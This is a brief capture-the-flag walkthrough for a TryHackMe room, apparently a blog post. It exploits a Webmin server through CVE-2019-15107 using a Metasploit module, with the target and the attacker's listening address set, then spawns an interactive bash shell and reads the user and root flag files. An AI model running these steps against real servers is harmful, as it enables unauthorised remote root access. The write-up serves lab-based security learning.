TryHackMe | Source
Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.
Introduction
Easy but still nice challenge. The challenge is build on CVE-2019–15107 which is a pretty serious issue.
Scanning
By doing Nmap we got the following output:
Right we have ssh running on 22 and Webmin httpd on 10000. Let’s hop into browser to check what’s in the web server.
Note the website is running on SSL(Secure Socket Layer), therefore, the link would be https://10.10.x.x:10000
Exploitation
msfconsole
search webmin
use 7
options
set RHOSTS 10.10.x.x
set LHOST your_vpn_ip
Make sure to set SSL — true(because the server is using SSL)
set ssl true
With all the parameters set we are good to go and run the payload. Type run or exploit
Simply type the following commands to get a stable shell :
python3 -c 'import pty;pty.spawn("/bin/bash")'
Flags
cat /home/dark/user.txt
cat /root/root.txt
Thank you for reading
Room Link: